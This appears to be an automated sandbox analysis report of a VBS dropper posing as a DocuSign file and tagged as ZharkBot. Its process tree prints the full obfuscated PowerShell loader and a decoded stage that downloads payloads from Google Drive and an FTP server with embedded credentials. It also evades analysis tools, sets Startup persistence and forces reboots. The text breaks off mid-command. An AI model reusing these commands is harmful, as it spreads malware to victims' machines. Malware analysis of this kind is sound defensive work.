Overview

overview

10

Static

static

1

DocuSign01...00.vbs

windows7-x64

10

DocuSign01...00.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 11:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DocuSign01210021100.vbs

  • Size

    117KB

  • MD5

    09b37aa6f30c0b1d83529d21212f416c

  • SHA1

    c1d1d0159bc1a8bb36c4a078ea653531707d27c0

  • SHA256

    b28413ca3c1fa5b50a96d5e9afc5e365efd8ac6be834e82b25c5bf323284f774

  • SHA512

    b87bd64f420b21ac3f68f1aa069c0569a3e685f29f55b86527a020a8ee91e0f4b3c0f1b368ed4d63240608dc59dff8b8cff191a2812833f36b9f298ae803de7b

  • SSDEEP

    1536:pwwwwwwwwQ+xgv0zmbqGwwwwwwwwwwwwwwwwwr:iu

Score
10/10
zharkbotbotnetdefense_evasiondiscoveryexecutionpersistence

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    fYudY1578@@@@@@

Signatures

  • Detects ZharkBot payload 3 IoCs

    ZharkBot is a botnet written C++.

  • ZharkBot

    ZharkBot is a botnet written C++.

    botnetzharkbot
  • Zharkbot family
    zharkbot
  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 10 IoCs
    persistence
  • Hide Artifacts: Hidden Window 1 TTPs 2 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

    defense_evasion
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DocuSign01210021100.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $mwxpv = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAGcAUg' + [char]66 + 'EAE8ATQAkADsAIAApACcAMQ' + [char]66 + 'zAHAALgAzADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAA7ACcAOwApACAAKQAgACAAJwAnAG0Acw' + [char]66 + '' + [char]66 + 'AGcAZQ' + [char]66 + 'SAEQARAAgAEQAJwAnACAAIAAsACAATQ' + [char]66 + 'vAHcATg' + [char]66 + 'zACQAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'jAG8Abg' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAbg' + [char]66 + 'jAGEAbg' + [char]66 + 'jAHUAbgAuAGMAbw' + [char]66 + 'tAC8AYgAuAHQAeA' + [char]66 + '0ACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAZw' + [char]66 + 'SAEQATw' + [char]66 + 'NACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAZw' + [char]66 + 'SAEQATw' + [char]66 + 'NACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAnACAAPQArACAAZw' + [char]66 + 'SAEQATw' + [char]66 + 'NACQAOwAgACcAOwAgACkAIAApACcAJw' + [char]66 + '' + [char]66 + 'ACcAJwAsACcAJwCTIToAkyEnACcAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'yAC4ARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'zAFsAIAA9ACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAJwAgAD0AKwAgAGcAUg' + [char]66 + 'EAE8ATQAkADsAIAAnADsAKQA4AEYAVA' + [char]66 + 'VACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIAAnACAAKwAgAGwARw' + [char]66 + 'mAFQAUwAkACAAKwAgACcAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAKAAgAD0AIA' + [char]66 + 'HAGUAYQ' + [char]66 + '5AHIAJAAgADsAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAA9ACAATQ' + [char]66 + 'vAHcATg' + [char]66 + 'zACQAJwAgACAAPQAgAGcAUg' + [char]66 + 'EAE8ATQAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgAGwARw' + [char]66 + 'mAFQAUwAkACAAaA' + [char]66 + '0AGEAUA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AdA' + [char]66 + '1AE8AIA' + [char]66 + '8ACAAeg' + [char]66 + 'IAGwAVA' + [char]66 + '1ACQAOwAgACkAIA' + [char]66 + '' + [char]66 + 'AFUAeg' + [char]66 + 'IAEQAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAIAA9ACAAeg' + [char]66 + 'IAGwAVA' + [char]66 + '1ACQAOwAgACkAIA' + [char]66 + 'RAEcAcA' + [char]66 + 'lAEkAJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAgACgAIAA9ACAAIA' + [char]66 + '' + [char]66 + 'AFUAeg' + [char]66 + 'IAEQAJAA7ACAAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'OAGwAcg' + [char]66 + 'oAFAAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + 'OAGwAcg' + [char]66 + 'oAFAAJAA7ACAAKQAnAHQAeA' + [char]66 + '0AC4AMgAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAbA' + [char]66 + 'HAGYAVA' + [char]66 + 'TACQAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAJwA4AEYAVA' + [char]66 + 'VACcAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALQAgAFEARw' + [char]66 + 'wAGUASQAkACAAaA' + [char]66 + '0AGEAUA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AdA' + [char]66 + '1AE8AIA' + [char]66 + '8ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAIA' + [char]66 + 'zAGsAcA' + [char]66 + 'zAGYAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAAgAD0AIA' + [char]66 + '2AFgAVQ' + [char]66 + 'WAFIAJAA7ACAAKQ' + [char]66 + 'xAEcAbA' + [char]66 + 'sAGwAJAAgACwAUA' + [char]66 + 'SAHIAag' + [char]66 + 'PACQAKA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAGsAcg' + [char]66 + 'vAHcAdA' + [char]66 + 'lAE4ALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8ALQ' + [char]66 + '3AGUAbgAgAD0AIA' + [char]66 + 'zAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMALg' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACAAPQAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAOwAgACkAKQAgADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADYANQAgACwANQA1ACAALAAzADUAIAAsADkANAAgACwAOQA4ACAALAAwADAAMQAgACwANwAxADEAIAAsADkAOAAgACwAMgAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAgAD0AIA' + [char]66 + 'xAEcAbA' + [char]66 + 'sAGwAJAA7ACAAKQApADkANAAsADYAMQAxACwANwA5ACwANAAxADEALAA4ADkALAA4ADEAMQAsADcAMAAxACwAOQA5ACwANQAxADEALAAxADAAMQAsADAAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAUA' + [char]66 + 'SAHIAag' + [char]66 + 'PACQAOwApACcAdA' + [char]66 + '4AHQALgAxADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'RAEcAcA' + [char]66 + 'lAEkAJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8AJwAgACsAIAAnAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8Acg' + [char]66 + 'iAC4AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC4AcA' + [char]66 + '0AGYAQAAxAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALwAvADoAcA' + [char]66 + '0AGYAJwAoACAAPQAgAHMAaw' + [char]66 + 'wAHMAZgAkADsAfQAgAAoADQA7AHQAaQ' + [char]66 + '4AGUAIAAgACAAIAAgACAACgANADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgAHIAZQ' + [char]66 + '0AHUAcA' + [char]66 + 'tAG8AQwAtAHQAcg' + [char]66 + 'hAHQAcw' + [char]66 + 'lAFIACgANACAAew' + [char]66 + 'lAHMAbA' + [char]66 + 'lAAoADQAKAA0AfQAKAA0AIAAgACAAIAAgACAAIAAKAA0AIA' + [char]66 + '7ACkAbA' + [char]66 + 'sAHUATgAkACAAcQ' + [char]66 + 'lAC0AIAApAGUAdQ' + [char]66 + 'uAGkAdA' + [char]66 + 'uAG8AQw' + [char]66 + '5AGwAdA' + [char]66 + 'uAGUAbA' + [char]66 + 'pAFMAIA' + [char]66 + 'hAGUALQAgACcAZQ' + [char]66 + '6AHkAbA' + [char]66 + 'hAG4AYQAnACwAJw' + [char]66 + 'TAE4ARA' + [char]66 + 'lAHQAYQ' + [char]66 + 'wAGEAJwAsACcAaw' + [char]66 + 'yAGEAaA' + [char]66 + 'zAGUAcg' + [char]66 + 'pAFcAJwAgAHMAcw' + [char]66 + 'lAGMAbw' + [char]66 + 'yAHAALQ' + [char]66 + '0AGUAZwAoACgAZg' + [char]66 + 'pADsAIAAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ' + [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACAAfQ' + [char]66 + 'lAHUAcg' + [char]66 + '0ACQAewAgAD0AIA' + [char]66 + 'rAGMAYQ' + [char]66 + 'iAGwAbA' + [char]66 + 'hAEMAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAGQAaQ' + [char]66 + 'sAGEAVg' + [char]66 + 'lAHQAYQ' + [char]66 + 'jAGkAZg' + [char]66 + 'pAHQAcg' + [char]66 + 'lAEMAcg' + [char]66 + 'lAHYAcg' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWw' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ACAAZgAvACAAMAAgAHQALwAgAHIALwAgAGUAeA' + [char]66 + 'lAC4Abg' + [char]66 + '3AG8AZA' + [char]66 + '0AHUAaA' + [char]66 + 'zACAAOwAnADAAOAAxACAAcA' + [char]66 + 'lAGUAbA' + [char]66 + 'zACcAIA' + [char]66 + 'kAG4AYQ' + [char]66 + 'tAG0Abw' + [char]66 + 'jAC0AIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAKQAgACcAcA' + [char]66 + '1AHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAbQ' + [char]66 + 'hAHIAZw' + [char]66 + 'vAHIAUA' + [char]66 + 'cAHUAbg' + [char]66 + 'lAE0AIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAHcAbw' + [char]66 + 'kAG4AaQ' + [char]66 + 'XAFwAdA' + [char]66 + 'mAG8Acw' + [char]66 + 'vAHIAYw' + [char]66 + 'pAE0AXA' + [char]66 + 'nAG4AaQ' + [char]66 + 'tAGEAbw' + [char]66 + 'SAFwAYQ' + [char]66 + '0AGEARA' + [char]66 + 'wAHAAQQ' + [char]66 + 'cACcAIAArACAARg' + [char]66 + 'rAFcAcA' + [char]66 + '0ACQAIAAoACAAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAG4AaQ' + [char]66 + '0AHMAZQ' + [char]66 + 'EAC0AIAAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAG0AZQ' + [char]66 + '0AEkALQ' + [char]66 + '5AHAAbw' + [char]66 + 'DACAAOwAgAHQAcg' + [char]66 + 'hAHQAcw' + [char]66 + 'lAHIAbw' + [char]66 + 'uAC8AIA' + [char]66 + '0AGUAaQ' + [char]66 + '1AHEALwAgAEIASA' + [char]66 + 'YAGgASAAgAGUAeA' + [char]66 + 'lAC4AYQ' + [char]66 + 'zAHUAdwAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAAgADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJAAoACAAPQAgAEIASA' + [char]66 + 'YAGgASAA7ACkAIA' + [char]66 + 'lAG0AYQ' + [char]66 + 'OAHIAZQ' + [char]66 + 'zAFUAOgA6AF0AdA' + [char]66 + 'uAGUAbQ' + [char]66 + 'uAG8Acg' + [char]66 + 'pAHYAbg' + [char]66 + 'FAFsAIAArACAAJw' + [char]66 + 'cAHMAcg' + [char]66 + 'lAHMAVQ' + [char]66 + 'cADoAQwAnACgAIAA9ACAARg' + [char]66 + 'rAFcAcA' + [char]66 + '0ACQAOwApACAAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJAAoACAALA' + [char]66 + '5AHIAbQ' + [char]66 + 'kAGcAJAAoAGUAbA' + [char]66 + 'pAEYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AbQ' + [char]66 + 'oAGcAZw' + [char]66 + '6ACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAG0AaA' + [char]66 + 'nAGcAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAG0AaA' + [char]66 + 'nAGcAegAkADsAfQA7ACAAKQAnAHcANQAwAFoAMQA4AHUAYwA3AFoATQ' + [char]66 + 'LADgAOA' + [char]66 + 'nAGUAdA' + [char]66 + 'oAGoAbg' + [char]66 + '' + [char]66 + 'AHAAagAxAEwAQgAtADQAeQ' + [char]66 + 'IAGEAYQAxACcAIAArACAAeQ' + [char]66 + 'yAG0AZA' + [char]66 + 'nACQAKAAgAD0AIA' + [char]66 + '5AHIAbQ' + [char]66 + 'kAGcAJA' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ADsAIAApACcAVg' + [char]66 + 'FAFMAZA' + [char]66 + 'qAHcAVQA5ADUAUgAtAFcAcw' + [char]66 + 'ZAHUAWg' + [char]66 + 'MAGkAdw' + [char]66 + 'yAGIANQ' + [char]66 + 'ZAE4AUQAtAEgAag' + [char]66 + 'yAGIAMg' + [char]66 + 'wADEAJwAgACsAIA' + [char]66 + '5AHIAbQ' + [char]66 + 'kAGcAJAAoACAAPQAgAHkAcg' + [char]66 + 'tAGQAZwAkAHsAIAApACAAYg' + [char]66 + 'RAFUAaQ' + [char]66 + 'QACQAIAAoACAAZg' + [char]66 + 'pADsAIAApACcANAA2ACcAKA' + [char]66 + 'zAG4AaQ' + [char]66 + 'hAHQAbg' + [char]66 + 'vAEMALg' + [char]66 + 'FAFIAVQ' + [char]66 + 'UAEMARQ' + [char]66 + 'UAEkASA' + [char]66 + 'DAFIAQQ' + [char]66 + 'fAFIATw' + [char]66 + 'TAFMARQ' + [char]66 + 'DAE8AUg' + [char]66 + 'QADoAdg' + [char]66 + 'uAGUAJAAgAD0AIA' + [char]66 + 'iAFEAVQ' + [char]66 + 'pAFAAJAA7ACcAPQ' + [char]66 + 'kAGkAJg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAGQAPQ' + [char]66 + '0AHIAbw' + [char]66 + 'wAHgAZQA/AGMAdQAvAG0Abw' + [char]66 + 'jAC4AZQ' + [char]66 + 'sAGcAbw' + [char]66 + 'vAGcALg' + [char]66 + 'lAHYAaQ' + [char]66 + 'yAGQALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAIAA9ACAAeQ' + [char]66 + 'yAG0AZA' + [char]66 + 'nACQAOwApACAAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAIAAoACAAbA' + [char]66 + 'lAGQAOwApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGoATQ' + [char]66 + 'PAHoASAAkAHsAIAApACAAeA' + [char]66 + 'DAGIAeA' + [char]66 + '2ACQAIAAoACAAZg' + [char]66 + 'pADsAIAApADIAKA' + [char]66 + 'zAGwAYQ' + [char]66 + '1AHEARQAuAHIAbw' + [char]66 + 'qAGEATQAuAG4Abw' + [char]66 + 'pAHMAcg' + [char]66 + 'lAFYALg' + [char]66 + '0AHMAbw' + [char]66 + 'oACQAIAA9ACAAeA' + [char]66 + 'DAGIAeA' + [char]66 + '2ACQAIAA7AA==';$mwxpv = $mwxpv.replace('уЦϚ' , 'B') ;;$ybsbt = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $mwxpv ) ); $ybsbt = $ybsbt[-1..-$ybsbt.Length] -join '';$ybsbt = $ybsbt.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\DocuSign01210021100.vbs');powershell $ybsbt
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $vxbCx = $host.Version.Major.Equals(2) ;if ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$gdmry = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $PiUQb ) {$gdmry = ($gdmry + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$gdmry = ($gdmry + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$zgghm = (New-Object Net.WebClient);$zgghm.Encoding = [System.Text.Encoding]::UTF8;$zgghm.DownloadFile($gdmry, ($HzOMj + '\Upwin.msu') );$tpWkF = ('C:\Users\' + [Environment]::UserName );HhXHB = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\DocuSign01210021100.vbs' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$fspks = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $fspks ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$sNwoM = ''C:\Users\Admin\AppData\Local\Temp\DocuSign01210021100.vbs'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$MODRg += 